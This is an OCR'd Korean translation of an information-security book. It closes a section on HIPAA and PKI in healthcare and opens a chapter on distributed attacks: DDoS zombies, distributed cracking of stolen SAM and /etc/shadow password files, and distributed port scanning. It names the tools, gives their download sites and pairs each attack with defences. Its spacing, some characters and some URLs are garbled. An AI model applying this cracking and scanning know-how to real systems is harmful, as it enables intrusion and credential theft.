체계만 있으면 인터네트를 상대적으로 마음 놓고 쓸수 있다. 사실 이것들이 보건부문에 
대 하여 HIPAA 가 요구하는 인 터네 트사용기 준들이 다. 

암호화요구사항을 만족시킬수 있는 오늘날의 제품과 대안들은 수없이 많으며 거기에 
쓰이는 공인된 알고리듬들은 3 DES , RSA , ECC 이며 AES 는 가까운 시기에 곧 출현할것이 
다. 그러나 인증요구사항은 실행상 상당한 난점을 제기하고 있다. 

오늘날 많은 보건기관들에서는 개인식별번호 ( PIN ) 와 통표를 사용하여 먼 거리에 있 
는 사용자를 믿 음직하게 두 요소로 인증하고 있 다. 현재 인 터네 트기 업 활동이 얼 마나 빨 
리 확대되고 있는가를 보면 이 인증방식도 보건산업의 소비자들 즉 사회전반에 표준화할 
수 없 다는것 이 자명해 진다. 그러 나 HIPAA 는 보건기 관들이 환자나 건강보험가입 자와 통 
신하는 경우 그 보호의무를 소홀히 하는것을 법적으로 허용하지 않고 있다. 

인 터네 트로 환자건강보험 의 가입 성 원들과 서 로 망으로 련계 를 맺 는 보건기 관들의 실 
례는 허다하다. 일부 병원들은 환자들에게 자기 실험결과를 비롯한 치료정보의 열람을 
허 용하고 있다. 일부 보험계 획 에서는 가입 자들이 자기 주소나 진료의사지정 을 갱 신하도록 
허용하는 체계도 리용하고 있다. 의사나 보험계획과 환자들사이의 전자우편통신은 보편 
화되고 있다. 

텍 싸스주 댈 러 스시 에 있는 로스페 로트가 경 영 하는 회 사인 페 로트 씨 스럼 즈는 보스턴 
지 역 의 주요보건기 관인 《 하바드필 그림 보건》과 수백 만딸라의 계 약을 맺 고《 인 터 네 트에 
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기초한 <미래적인 보건기관〉창설》에 착수하였다. 

2000년 11월에 첫 단계로서 Web 싸이트를 개설하여 종업원들이 보건계획에 가입하도 
륵 하였다. 그러나 앞으로《폐로트는 병원들，의사들，기업주들，성원들 그리고 보건기관 
전체가 망에 가입하고 환자정보를 시간별로 갱신할수 있는 체계 즉 <21세기에 실시되여 
야 할 의학의 본보기>를 내다본다.》(엘 꼬왈스위크의 기사《폐로트의 보건리상:억만장 
자와 하바드필그림 은 인터네 트에 기초한 체계 를 본다.》《 보스런 글로브》신문 2000년 3 
월 8일부 D 1 페지). 

그러나 이러한 통신은 흔히(언제나 그런것은 아니지만) 암호화되지만 표준적으로는 
환자나 가입자가 정적인 통과암호나 개별식별번호로만 인증하는 방법으로 진행된다. 보 
건기관들인 경 우에 두 요소인증방법 을 리 용하여 자기 종업 원들의 전화망접 속을 실 현시키 
는데도 이 런 방식 을 쓴다. 

그렇다면 이렇게 호상 현저히 차이나는 수준의 보안을 어떻게 량립시키는가. 오늘날 
많은 보건기 관들은 HIPAA 요구사항들은 알지 도 못하고 있 으며 리유를 불문하고 사회 와 
진행되는 정보통신에는 적용되지 않는것으로 기대하고 있는것이다. 이러한 회피현상은 
두요소인증해 결책의 실현과 그 해결책 을 모든 환자나 보건계 획 가입 자들에게 까지 확대하 
는것이 실지로 비용(딸라나 품)이 많이 들거나 많이 든다고 생각하는데 기인된다. 그런데 
보건관련인터네트거래량과 보건업무상 용도가 앞으로 더 확대될것은 분명하다. 그러나 
일부 기관들에서는 이 러한 보안통제를 자기 기관의 금후 몇년간의 전략적목적의 테두리 
안에서 어떻게 실현할것인가에 대하여 고려하기 시작한데 불과하다. 

가장 가능성 있는 해결책은 현재 공개열쇠기반 ( PKI ) 과 수자식인증서 및 서명체계를 
실행하는데 있는것으로 보아 진다. 일부 PKI 지지자들이 잘못 생각하고 1988년에 제기된 
HIPAA 보안 및 수자식 서 명표준안이 PKI 채 택 을 요구할것 으로 주장하고 있지 만 운용호환 
성 기술들의 집 합체 인 PKI 는(암호화，부인방지，통신문의 무결성 과 더 불어 ) 강력한 보안통 
제 수단을 포괄하는 강한 원격인증을 위한 확고한 약속을 안겨 주는것 이 라고 보아 진다. 

신용카드와 은행카드가 무형의 형태로 리용될 때 금융세계에서 나타날수 있는 사기 
협 잡의 가능성 들에 대 하여 생 각해 보라. 전체 신용카드거 래 의 몇프로만 인 터네 트를 통하 
여 진행되지만 사기건의 대부분은 바로 신용거래에서 생기고 있다. 또한 Visa USA 사에 
의하면《 협 잡주문건수가 벽돌건물상점 에서 는 100딸라당 6쎈트밖에 안된다면 인터네 트상 
으로는 100딸라당 10〜15쎈트에 이르고 있다.》(《보스런 글로브지) 2000년 10월 9일 C 1, 
9페지). 소비자의 책임은 극히 적으며 은행 잘못도 아니다. 1999년에 American Express 사 
는 American Express Bluecard 를 도입하였는데 여기 에 는 바로 신원(카드소지 자의 인증)의 
확인과 보안을 보다 강화하기 위한 전용소편이 들어 있다. 특히 최 근에 VISA 사도 소편 
을 내 장한 카드를 공급하기 시 작하였 다. 두 경 우에 카드읽 기장치 는 소비 자들에 게 자유판 
매할수 있다. 사기건의 위협으로 딸라손실을 예상한 많은 기업들이 사기방지대책을 취함 
에 따라 PKI 산업은 추동력을 얻어 표준화，응용호환화，보다 눅은 원가에로 점차 나아갈 
것으로 보인다. 

우리가 쓰는 은행카드와 신용카드가 수자식 인증서를 내장한 스마트카드로 되면 가정 
용콤퓨터 나 무릎형 콤퓨터 에 인 차 스마트카드읽 기장치 를 가지 게 되 는것 이 표준으로 될 것 
이며 이 카드읽 기장치들은 여 러 가지 카드를 다루게 될것 이 다. 처 음에는 이것 이 수십년전 
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에 그러하였던것처 럼 연유공급소와 백화점에서 받은 신용카드가 가득 찬 돈지갑과 류사 
한 새 세기판 돈지갑으로 볼수 있을것이다. 많은 기업들과 기관들이 서로 자기의 스마트 
카드를 발급하고 그것을 통하여 그 카드의 소유자가 본인이 맞다는것을 확인할것이다. 
결국 매 사람은 그 카드를 반드시 소지할뿐아니라 그것을 사용하기 위한 비밀개인식별번 
호 ( HN ) 도 알고 있어 야 한다. 

오늘 다목적신용카드 같은것을 가지 고 있는 사람의 수는 비 록 적지만 그 전자스마트 
카드는 빨리 다목적카드로 되 여 상업 자들과 은행 을 비롯한 금융기 관들에서 인정 을 받음 
으로써 사람들이 가지 고 다니 는 카드(수자식 인증서 들과 비 밀 열쇠까지 포함하여)의 수를 
줄일수 있게 될것이다. 금융기관들의 기반시설체계는 이미 다 되여 있으므로 ( ATM 에 써 
붙인 공통적인 망기호들인 NYCE , Cirrus 등을 볼것) 이번에는 몇가지의 표준안과 물리적 
인 카드가 하루밤사이에 나올수도 있다. 

1999년 10월에 열린 제22차 전국년례정 보체계보안대회 에서 정 보보안전문가들이 
예 측한바에 의하면 수자식 인증서 그리 고 지 문과 같은 생 체 인식지 표가 추가된 스마 
트카드는 3〜5년 내 에 표준화될것 이 라고 한다. HIPAA 정 보안전 및 사적 비밀 조항의 준 
수마감날자가 2003년초까지이 므로 안전한 원격정 보통신을 보장하자면 보건산업 이 
제때에 그것을 도입해야 할 때가 왔다고 본다. 오늘의 보건계획과 병원신원증명서들 
은 래일의 스마트카드가 되 여 환자들과 가입 자들로 하여 금 자기 들의 기 록정 보를 제 
때 에 갱 신 하며 시 간약속을 하며 약처 방을 떼 는 일 을 단번 에 편 리하게 할수 있 게 할 
것이며 다른 그 누구도 자기처럼 위장하여 자기의 기록자료들에 비법적으로 접근하 
지 못한다는 확신을 가질수 있게 할것이다. 결국 이것이 바로 개인정보에 대한 보호 
인것이다. 


결 론 


정 규적 인 정 보보안계 획 작성 의 사회 적 및 업 무적필 요성 을 인식하는데서 보건산업 은 
력사적으로 국가경제의 그 어느다른 부분보다도 뒤떨어 져 있다. 

보건산업에서 인터네트를 급격히 사용하고 있는것으로 하여 부분적이지만 모든것이 
점 점 로출되 여 가며 그리 고 사적비 밀 보호에 대 한 사회계 의 관심 과 우려 가 날로 높아 가 
고 있는 이때 에 정보보안을 요구하는 련방법 인 HIPAA 의 출현과 사적비밀보호문제 로 하 
여 보건산업은 자기의 모습을 뚜렷이 보여 주고 있다. 이것은 정보보안계로 하여금 우리 
모두와 관련되는 분야인 우리의 건강에 자기 지식과 기교를 남김없이 적용할 좋은 기회 
로 되고 있다. 
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제 3 장. 새로운 류형의 해커도구와 그에 
대처한 방안 

에드 슈코우디스 

콤퓨터공격도구와 수법에서 첨단기술은 급속한 속도로 발전하고 있다. 봉사거부공격 
도구，통과암호해독도구，포구스캔도구，엿보기도구 ( sniffer ) 와 루트키트 ( RootKit ) 와 같은 몇 
십년전부터 써오는 실효성 있고 전통적 인 수많은 콤퓨터공격도구들에 아직 도 골탕을 먹 
고 있 다. 그러 나 이 기 초적 인 도구들과 기 법 들중 많은것 들이 지난 1〜2년동안 개 화기 를 
맞이하였는데 그것 은 능력 을 보다 강화하는 새 로운 특징 과 구조체 계 로 보강되 였기 때 문일 
것 이 다. 해 커 들은 광범 위하게 리용되 는 규약들과 조작체 계 의 바로 심 장부를 깊숙이 뚫고 
있다. 해커들의 능력이 높아 가는것과 함께 그들의 콤퓨터공격도구들도 점점 사용하기 
쉬워 지고 있다. 아하 이렇게 만들어 졌구나 하고 생각할 때에는 벌써 다른 새롭고 보다 
쓰기 편리한 해 킹도구가 출현하여 자기 의 새 로운 기 능으로 강타를 먹일것 이 다. 인터네 트 
에 약한 공격대상들이 많이 있는데 다가 공격 도구가 더 정 교해 지 고 쓰기 편리해 지는것 
으로 하여 오늘 우리는 해킹의 황금시대에 살고 있다. 

이 장의 목적은 콤퓨터공격도구제작의 최근 동향을 개괄하자는것이다. 우리의 콤퓨 
터를 최대한 보호하기 위해서는 우리의 적들의 능력과 전술들을 잘 알아야 한다. 이 목 
적 을 위하여 이 장에 서 는 분산공격，적 극적엿 보기，핵 심 부준위 루트키 트를 비 롯한 공격 도 
구의 일부 공격분야를 매 공격형태에 대처한 방안과 함께 보기로 한다. 

분산형공격 


콤퓨터공격 도구의 창조에 서 일 차적 으로 주목되 는 추세 의 하나는 분산형공격구조에 로 
의 움직 임 이 다. 원리 적 으로 공격 자들은 인터네 트자체 의 분산된 능력 을 재 치 있게 리용하 
여 공격 능력 을 높이 고 있다. 여 기 에서 책 략은 명 백하며 아마 이 분산형공격도구의 일부 
능력만 주어 지면 교묘하게 움직 일것 이 다. 공격 자는 보통 콤퓨터공격을 할 때 이 일을 많 
은 콤퓨터 로 나누어 진행한다. 공격 에 합세하는 콤퓨터 체 계 가 더 많으면 많을수록 공격 
성 공의 기회 는 더 욱 커 진다. 이 분산형공격 은 공격 자에게 다음과 같은 유리한 점들이 있 
다. 

• 람지하기 보다 어 렵 다. 

• 공격자추적을 보다 어렵게 한다. 

• 공격 속도를 높임 으로써 짧은 소요시 간내 에 소기 의 목적 을 달성한다. 

• 한 공격 자가 공격 대 상에 서 더 많은 자원을 소비하게 한다. 
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그러면 공격자는 분산형공격개시에 필요한 이 모든 기계들을 어디에서 얻는가. 유감 
스럽게도 인터네트상에는 매우 약한 기계들이 굉장히 많으므로 언제든지 그것들을 쓸수 
있다. 이러한 체계들을 소유하고 있는 사람들이나 관리하는 사람들은 대체로 판매업체로 
부터 보안프로그람들을 가져다 보강대책을 하기는 커녕 지함에서 그냥 꺼낼 때의 기정값 
설정을 그대로 쓰면서 설정을 안전하게 해놓지도 않고 있는 사람들이다. 각급 대학들과 
각이한 규모의 회사들, 정부기관들과 가정들이 인터네트에 항상 접속되여 있으면서도 안 
전설정이 한심하여 공격자들의 좋은 먹이감으로 되기 쉽다. 수준이 낮은 공격자들도 전 
세계의 수백수천개의 콤퓨터를 쉽게 점령해 치울수 있다. 이 공격자들이 쓰는 도구는 
Nessus 회 사의 취 약성 스캐 너 ( http :// www . nessus . org ) 와 같은 무료쏘프트웨 어 도구와 자체 스크 
립트로 만든 자동취약성스캐너이며 이것으로는 인터네트에서 두세번 큼직히 스캔해 낼수 
있 다. 공격 자들은 취 약한 콤퓨터 체 계 들을 점 령 하기 위하여 밤낮으로 무차별 적 인 스캔 을 
진행한다. 적 당한 수의 콤퓨터체 계를 확보하면 이 불행한 콤퓨터들을 토대 로 지정된 공 
격대 상에 대 한 분산형공격 을 진행한다. 

공격 자들은 분산형체계 에 맞게 여 러 고전형콤퓨터공격 도구들을 개 량하였 다. 이 장에 
서 는 분산형 봉사거 부공격，분산형 통과암호해 륙% 분산형포구스캔，중계 공격 과 같은 가장 파 
급적 인 분산형공격 도구와 수법 들을 보기 로 한다. 

분산형봉사거부공격 

가장 인기 있고 가장 널 리 리용되 는 분산형공격 기법의 하나는 분산형봉사거부 
( DDoS ) 공격 이다. 이 공격시 공격자는 우선 수많은 콤퓨터체계들을 확보한 다음 매 콤퓨 
터에 좀비 ( Zombie ) 라고 하는 원격조종프로그람을 설치한다. 이 좀비는 매 콤퓨터들의 배 
경에서 조용히 기동하여 명령을 기다린다. 공격자는 어느한 콤퓨터에서 기동하는 어떤 
전문화된 의뢰기프로그람을 사용하여 이 좀비체 계 들을 조종한다. 공격 자는 하나의 의뢰 
기콤퓨터를 리용하여 방대한 수의 좀비 들에 지 령을 보내 여 그것 들이 동일한 행동을 동시 
에 수행하게 한다. 분산형봉사거 부공격 에 서 가장 흔히 쓰이 는 공동행 동은 공격 대 상에 파 
케트를 동시에 다량적으로 보내는것 이다. 모든 좀비들이 파케트를 동시에 다량으로 보내 
면 희생물이 된 그 콤퓨터는 갑자기 엉터리 없는 가짜전송흐름에 파묻히고 만다. 일단 
그 콤퓨터의 통신선로용량이 고갈되 여 버리면 그 어떤 합법적 인 사용자의 신호도 그 를 
퓨터에 도달하지 못하게 되여 결국 봉사거부가 생긴다. 

분산형봉사거부공격의 방법 이 세 상에 요란히 선보인것은 2000년 2월 몇개의 유명한 
인터네트싸이트들이 이러한 공격을 받았을 때였다. DDoS 도구들은 끊임없이 발전하여 그 
특성이 이제는 점점 더 참기 어려운것으로 되고 있다. 최신형태의 DDoS 공격은 넓은 범 
위의 위장능력까지 가지고 공격자의 콤퓨터와 좀비들사이 그리고 좀비들과 공격대상콤퓨 
터사이 의 모든 통신을 다 가짜원천주소로 진행한다. 그러 므로 파케 트범 람이 시 작되 면 수 
사관블틋 사건추적을 매 경로기의 구간을 하나씩 차례로 흙어 피해자콤퓨터부터 매 좀비 
들을 조사해야 한다. 좀비들을 다 훑어 걷어 내면 그다음에는 여러가지 반사경로들이 다 
중적 인 인터네 트봉사제 공자들을 전반적 으로 훑어 가며 좀비들로부터 범 인콤퓨터 까지 추 
적해 나가지 않으면 안된다. 또한 DDoS 공격도구들은 암호화기 법 으로 좀비 들의 위 치를 
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위 장해 치우고 있다. 기성세 대의 DDoS 도구들을 보면 대부분의 범 인콤퓨터 쏘프트웨어 에 
는 좀비 들의 망주소명 단이 있는 파일 이 있 었 다. 이 의 뢰기콤퓨터 를 발견하면 수사림 은 
재 빨리 좀비 들의 위 치를 알아 내 여 제거하게 되 여 있었다. 최근 이 좀비주소목록파일을 
암호화해 놓기 때 문에 새 세 대 DDoS 도구를 가지 고는 범 인콤퓨터 를 추적하였 다 하더 라도 
좀비들의 위치를 알아 낼수 없게 되여 있다. 

분산형봉사거부공격에 대처 할 방안들 

DDoS 공격까지 포함한 파케트범람에 대처하기 위하여서는 주요련결망들이 충분한 대 
역 과 예 비공간을 확보하여 단순한 공격 들을 물리칠수 있게 하는것 이 중요하다. 공격 자에 
의하여 모든 하위련결망이 쉽게 차단되기때문에 만약 어느 한 련결망이 해당 기관에서 
사활적 인 경 우에 는 예 비 T 1 련결이 라도 가지 고 있는것 이 좋다. 

이 기 초대 역 을 가지 면 최 저 급의 공격 자들은 제 거할수 있지 만 100〜1,000대 의 콤퓨터 
에 좀비들을 설치하고 목표물로 지향시키는 공격자들을 막아 낼 충분한 대역을 확보할수 
는 없 다는것 을 알아야 한다. 만일 인 터네 트에 련결된 그 콤퓨터 를 쓰는 문제 가 기 업 전반 
에 사활적 인 경 우에 는 보충적 인 기 술을 도입하여 DDoS 공격 을 처 리할수밖에 없 다. 기 술 
적 견지에서 는 전송흐름구성 도구를 고려하는 수가 있을수 있 다. 이 도구를 쓰면 들어 오 
는 대 화회 수를 조절 하여 자기 봉사기 의 부담을 덜 어 줄수 있 다. 물론 핑장한 량의 좀비 
군이 한개 선로로 무리 지어 범람해 오면 전송흐름구성도구도 마비되여 버릴수 있다. 그 
러므로 공격이 현재 진행중인가를 알기 위하여 침입검출체계 ( IDS ) 를 리용해야 한다. 이 
IDS 는 일종의 망도적경 보장치 로서 IDS 자료기 지 에 기 억된 일 반공격표적 들과 대 조하여 보 
는 방법으로 망전송흐름을 감시한다. 공정적인 견지에서는 IDS 에서 나오는 이러한 경보 
신호를 처 리할수 있 는 사건대 응림 을 가동시 켜 대 기 시 켜 야 한다. 업 무에 필 수적 인 인 터네 
트련결선로를 위해서는 인터네트봉사제공자 ( ISP ) 의 사건대응림을 찾기 위한 무선전화 및 
호출기번 호들을 가지 고 있 어 야 한다. DDoS 공격 이 시 작되 면 자기 기 관의 사건대 응림 은 
신속정 확히 인 터네 트봉사제 공자의 사건대 응림 의 무력 을 안내 하고 인도해 줄수 있 어 야 한 
다. 발동이 걸 리면 인터네 트봉사제공자는 자기의 망에 려과장치들을 전개하여 적극적으 
로 밀려 오는 DDoS 공격을 막을수 있게 된다. 

분산형■과암호해독 

통과암호해독수법은 최근 몇해동안 성행해 온 또 하나의 해 킹기 법으로서 분산형공격 
에서는 그 기능이 계속 강화되고 있다. 이 수법은 현대적인 콤퓨터체계들 ( UNIX 와 
Windows NT 와 같은)에는 인증으로 쓰는 암호화된 통과암호들을 담은 자료기지가 있다는 
사실에 기초하여 착안한 기법이다. Windows NT 에는 통과암호들이 SAM 자료기지에 기억 
되여 있다. UNIX 체계에는 통과암호들이 / etc / passwd 나 / etc / shadow 파일들에 있다. 사용자가 
체계에 가입하면 콤퓨터는 사용자에게 통과암호를 물어 보고 사용자가 입력한 값들을 암 
호화하여 이 미 암호화되 여 보관된 통과암호와 비 교한다. 일 치하면 사용자의 망가입 은 허 
용된 다. 


36 



통과암호해독의 원리는 간단하다. 암호화된 통과암호파일을 훔치고 통과암호를 추측 
하고 그 추측한것을 암호화한 다음 훔쳤던 암호화된 통과암호파일에 들어 가 있는 값과 
비 교해 본다. 만일 추측값을 암호화한것 이 암호화된 통과암호와 일치하면 공격 자는 통과 
암호를 알아 낸것 이 나 갈다. 만일 두 값이 일치하지 않으면 공격자는 추측을 달리 한다. 
사용자통과암호는 사용자의 신원내용과 사전에 있는 단어，기타 문자들로 추측하여 흔히 
조합할수 있으므로 이 기법이 통과암호를 밝혀 내는데서 대체로 매우 성공적이다. 

전통적인 통과암호해독도구들은 추측，암호，비교，순환고리를 자동화하여 통과암호 
를 신속정확히 결정할수 있게 한다. 이 도구들은 사용자신원，사전용어들, 강제력을 리용 
하여 가능한 모든 조합을 구성하고 추정하는 방법으로 통과암호를 밝혀 낸다. 보다 성능 
높은 통과암호해 독도구들은 사전에 있는 표준단어 들의 앞뒤 에 강제 식 방법 으로 문자들을 
불였다뗐다 하면서 복합공격을 가하기도 한다. 대부분의 통과암호들은 단순히 어떤 사전 
단어의 앞이나 뒤에 특수문자들을 몇개 덧붙여 놓은것이기때문에 복합공격을 들이대면 
성공률이 상당히 높아 진다. 일부 성능이 가장 높은 전통적인 통과암호해독도구들로는 
Windows NT 용 LOphtCrack ( http :// www . lOpht . com 에서 구입가능함)와 UNIX 와 Windows NT 
를 비롯한 여 러 가지 체 계들에서 쓰는 John the Ripper ( http :// www . openwall . com 에서 구입 가 
능함)가 있다. 

통과암호해 독에 서 는 속도가 기 본문제이 다. 통과암호추측값을 더 짧은 시 간내 에 더 
많이 창조하고 검사할수록 공격자는 그만큼 더 많은 통과암호를 알아 내게 된다. 전통적 
인 통과암호해 독도구들은 이 속도문제 를 해 결 하기 위하여 추측값을 암호화하는데 쓰이 는 
암호알고리 듬실 행 을 최 량화하고 있 다. 공격 자들은 보다 높은 속도를 위하여 암호해 독과 
정 의 작업 량을 수많은 콤퓨터 들에 분산시키 는 방법 을 적 용할수 있 다. 공격 자들은 신속정 
확히 통과암호를 해 독하기 위하여 인 터네 트에 널 려 있는 수백 수천대 의 콤퓨터 들을 장악 
하고 동원하여 하나의 통과암호파일을 뚫고 를어 가 휘저어 놓기도 한다. 

분산형 통과암호해 독을 실 행 하기 위하여 공격 자는 전통적 도구를 리용하여 작업 량을 
수동적으로 하나하나 나눈다. 실례로 어느 한 공격자가 10개의 통과암호를 가진 암호파 
일을 해독한다고 하자. 공격자는 한 부분에 하나의 통과암호가 들어 가게끔 이 파일을 
10개의 부분으로 갈라서 10대의 콤퓨터 에 나누어 준다. 매 콤퓨터 에서는 전통적암호해독 
도구가 동작하여 자기가 맡은 하나의 통과암호를 해독한다. 혹은 10개의 모든 통과암호 
를 매 콤퓨터 에 분배 하고 매 기 계의 해 독도구가 갈은 사전의 서 로 다른 부분이 나 일정한 
문자만 강제식 으로 제 각기 분석해 내 도록 할수도 있 다. 

수동으로 작업 량을 조개 는 전통적 인 통과암호해 독도구를 사용하는것 이 외 에 도 최 근 
몇년 간에 자체 로 만든 몇 가지 분산형 통과암호해 독도구도 나왔다. 이 도구들은 자동적으 
로 여러 콤퓨터들에 작업량을 분배하며 공격이 진척됨에 따라 콤퓨터지원을 조정하기도 
한다. 가장 대 중화된 일 련의 분산형 통과암호해 독도구로서는 Mio - Sta 와 SaWne Cracker 를 
들수 있는데 이 것 들은 다 http :// packetstorm . security . com 八 listributed 에 서 구입 할수 있 다. 

분산형통과암호해독에 대처한 방안들 분산형통과암호해독에 대처 한 방어 대 책 들은 실 
지 전통적 인 통과암호해독에 대처한 방안과 같다. 즉 체계 에 있는 약한 통과암호들은 제 
거해 버리 는것 이 다. 분산형해 독에 서는 암호해 독속도가 높기 때 문에 비 분산형암호해 독이 
지배적 이던 이전보다 통과암호를 더 추측하기 힘들게 하여 야 할 필요가 있다. 매 통과암 
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호의 길이를 최소길이보다 더 길게(아홉자리문자렬보다 더 길게) 하며 매 통과암호에 수 
자，문자，특수기호들을 포함시키는것을 초보적 인 원칙으로 삼도록 하는것이 좋을수 있다. 
모든 사용자들이 이 원칙을 알게 하며 예측불가능한 통과암호의 중요성을 강조해 주는것 
이 비결이다. 또한 이러한 통과암호방책을 실시하기 위해서는 인증봉사콤퓨터에 통과암 
호려과도구들을 설치할수도 있다. 어느 한 사용자가 새로운 통과암호를 개설하면 이 도 
구들이 그 통과암호가 통과암호방책에 부합되는가를 검열하게 해야 한다. 통과암호가 너 
무 짧거 나 수자，문자，특수문자들을 포함하지 않는 경우 사용자에게 다른 통과암호를 만 
들것을 요구할수 있 다. Windows NT 의 Resource Kit 에 있는 passfilt.dll 파일과 UNIX 체계의 
passwd + 프로그람은 일 련의 제 3자적인 보충적 인증프로그람제 품들이 그러 하듯이 이 런 특성 
을 제공하고 있다. 또한 매우 예민한 기밀보장환경에서는 아예 표준적인 통과암호제도를 
없애 버리고 통표 ( token ) 에 의한 접근기술을 도입하는것도 나쁘지 않다. 

마지 막대 책 으로서 는 보안담당자들이 정 기적 으로 통과암호해 독도구를 리용하여 자기 
기관의 사용자들의 통과암호를 검열해봄으로써 공격자가 손을 쓰기전에 취약한 고리들을 
찾아 내는것이다. 취약한 통과암호들이 발견되면 그 사용자들에게 보다 강한 통과암호를 
쓸것 을 통지해 주는 명 백 하고도 허 용된 공정 이 있 어 야 할것 이 다. 기 관내 적 인 암호해 독사 
업 을 하기 전에 경 영 진이 이 중요한 보안계 획 을 리해 하고 지 지하도록 해 야 하며 해 당 승 
인을 반드시 사전에 받아 두는것을 잊지 말아야 한다. 경영진의 동의를 받지 못하고 이 
사업 을 시 작하면 자기 의 직 업 에 부정 적 영 향을 미 칠 수 있 다. 

분산형포구스캔 

분산형 방법 에 적 합한 또 하나의 공격 수법 은 포구스 캔 이다. 포구는 전송조종규약 
( TCP ) 과 사용자데타그람규약 ( UDP ) 에서 중요한 하나의 개 념 이며 이 두 규약들은 거의 모 
든 망봉사에서 사용되고 있다. 망에서 TCP 와 UDP 자료흐름을 받는 매 봉사기는 하나 혹 
은 그이상의 포구접속을 기다린다. 이 포구들은 콤퓨터에 있는 자그마한 가상출입문과 
같아서 여기로 자료파케트들이 들어 가고 나가고 한다. 포구번호들은 파케트들이 향하고 
있는 한 체 계의 주소역 할을 한다. 체계의 행정 관리자가 망봉사가 어 느 포구를 기 다리겠 
는가를 설정은 할수 있지만 대부분의 봉사들은 보통 잘 알려 진 포구를 기다림으로써 의 
퇴기프로그람으로 하여금 어디로 그 파케트들을 보내겠는가를 알게 한다. Web 봉사기들 
은 대체 로 TCP 포구주소 80을 기 다린다면 인터네 트우편봉사기 들은 TCP 포구주소 25를 기 
다린다. 령역이름봉사기는 UDP 포구주소 53의 질문을 기 다린다. 수백개의 각종 포구들은 
http :// www . ietf . org / rfc.html 에서 구입 할수 있는 문건인 RFC 1700에서 볼수 있는바와 같이 
각이한 봉사형 태 에 배 당되 여 있 다. 

포구스캔은 목표체계 에 있는 각이한 포구들에 파케트들을 보내 여 어느 포구가 봉사 
신호를 기 다리 고 있는가를 결정하는 과정 이 다. 이것은 목표체계의 문들을 하나하나 두드 
려 보고 어느것이 열려 있는가를 알아 내는것과 류사하다. 목표체계에서 어느 포구가 열 
려 있는가를 아는 방법으로 공격자는 그 기계에서 실행되고 있는 봉사형태를 알수 있게 
된다. 그다음 공격자는 이 열려 진 포구들과 관련되는 봉사에 공격을 집중할수 있게 된 
다. 또한 목표체계에서 열려 진 매 포구는 공격자에게 있어서 가능한 침입점으로도 된다. 
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공격자는 그 콤퓨터에 대하여 스캔하고 TCP 포구 25 와 UDP 포구 53 이 열려 있음을 확인 
한다. 그 결과를 보고 침입 자는 그 콤퓨터 가 우편봉사기 이며 DNS 봉사기 일수 있다는것을 
안다. 현재 방대한 수의 전통적 인 포구스 캔 도구들이 나와 있지 만 가장 강력한 도구는 
Nmap 도구로서 http://www.insecure.org 에 서 구입 할수 있 다. 

포구스캔이 보다 심도 있는 공격의 전조로 되기때문에 보안관계자들은 IDS 도구들을 
씨서 포구스캔을 조기경보신호로 하여 이것을 검출해 낼수 있다. 대부분의 IDS 는 포구스 
캔을 인식하는 고유한 기능을 가지고 있다. 한 파케트가 주어 진 원천으로부터 어느 한 
포구를 거쳐 도착하고 그후에 다른 파케트가 같은 원천으로부터 다른 포구에 도착하고 
또 다른 파케트가 또 다른 포구에 도착하면 IDS 는 신속히 이 파케트들을 호상 확인하는 
방법으로 포구스캔을 검출할수 있다. 이런 통신방식은 그림 3_1 에서 왼쪽에 있는것과 
갈으며 여기에 포구번호가 원천망주소공격을 위해 배치되여 있다. IDS 는 이 스캔을 쉽게 
포착한 다음 경보신호(혹은 행정책임자에게는 전자우편)를 보낼수 있게 된다. 

그러면 공격자가 분산형포구스캔을 할 때 어떤 현상이 일어 나는가를 보자. 하나의 
주소로부터 다량의 파케트를 단번에 련발사격을 할 대신에 공격자는 이 스캐닝에 많은 
콤퓨터 들이 참가하게 설정해 놓을것 이 다. 여 러 콤퓨터 들은 협 동하여 스캔하면서 목표를 
퓨터에 있는 흥미 있는 포구들을 모두 검사하여 결과를 보내면 공격자는 이것들을 서로 
련관시킨다. 전통적인 포구스캔의 형태를 감시하는 IDS 는 이 공격을 람지하지 못한다. 
그래서 그림 3 — 1 의 오른쪽에서 보는바와 같이 들어 오는 파케트들의 형태는 산발적인것 
으로 보이 게 된다. 이 런 방법 으로는 분산형포구스캔을 검 출하기 더 욱 어 렵 다. 



원천망주소 원천망주소 

그림 3-1. 전통형 스캔과 분산형스캔 


물론 IDS 체계는 원천주소가 아니라 목표주소(즉 파케트들이 가는 곳의 주소)에 초점 
을 집 중하면 분산형포구스캔 을 탐지해 낼수 있 다. 가령 수많은 콤퓨터 들에 서 갑자기 어 
느 한 콤퓨터에 있는 여러 포구들에 파케트들을 보내면 IDS 는 포구스캔이 진행중인것으 
로 추측할수 있 다. 그러 나 공격 자는 분산형 스캔을 장기 적 으로 진행하는 식 으로 탐지 가능 
성을 더욱 약화시킨다. 분산형스캔을 보다 오랜기간(례하면 한주 혹은 한달간) 진행하면 
공격 자가 I-DS 를 교묘히 속여 넘길수 있는 가능성 이 상당히 커 진다. 분산형 포구스캔할 
때 공격 자추적 이 더 욱 불가능한것 은 또한 스캔 작업 을 수행하는 를퓨터 가 공격 자의 소유 
가 아닌 여러 곳에 있기때문이다. 

여러가지 분산형포구스캔도구들이 현재 나돌고 있다. 어떤 침입자는 그 이름을 보아 
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도 명백한 phpdistributedportscanner 프로그람을 쓸수 있는데 이 도구는 자그마한 스크립트 
토서 Web 봉사에 태 워 스캔을 진행할수 있 다. 공격 자가 물리 평 면가능 ( PHP - enabled)Web 봉 
사기를 점령할 때마다 그 봉사기에 스크립트를 떨구어 그것을 리용하여 다른 콤퓨터들에 
대 한 스캔 을 진행한다. 공격 자는 HTTP 요구명 령 을 리용하여 각이한 Web 봉사기 들에 서 실 
행되는 개별적인 스캐닝스크립트들과 호상 련계를 가진다. 모든것이 Web 상에서 진행되므 
로 분산형포구스캔은 실행시키기 상당히 쉽다. 이 스캐닝도구를 구입할수 있는 곳은 
http :// www . digitaloffense . net :8000/ phpDistributedPortScanner/°l 다. 다른 형 의 분산형 포구스캐 
너 들은 의 뢰기/봉사기 구조에 기 초한것 으로서 대 표적 인것 들로는 Dscan ( http :// packetstorm . 
security.com 八 listributed 에서 구입가능함)과 SIDEN ( http :// siden . sourceforge.net 에서 구입가능 
함)을 들수 있다. 

분산형포구스캔에 대처한 방안들 최선의 방도는 자기콤퓨터체계에 있는 필요 없는 봉 
사체계들을 몽땅 닫아 버리 는것 이 다. 자기 체 계의 유일한 목적 이 HTTP 와 HTTPS 를 통한 
통신을 하는 Web 봉사기운영 이 라면 TCP 포구 80과 TCP 포구 443만 열어 놓고 있으면 되 
는것 이 다. Web 봉사기 로 리용되는 기 계이므로 거기서 가동하는 우편봉사체 계 가 필요 없 
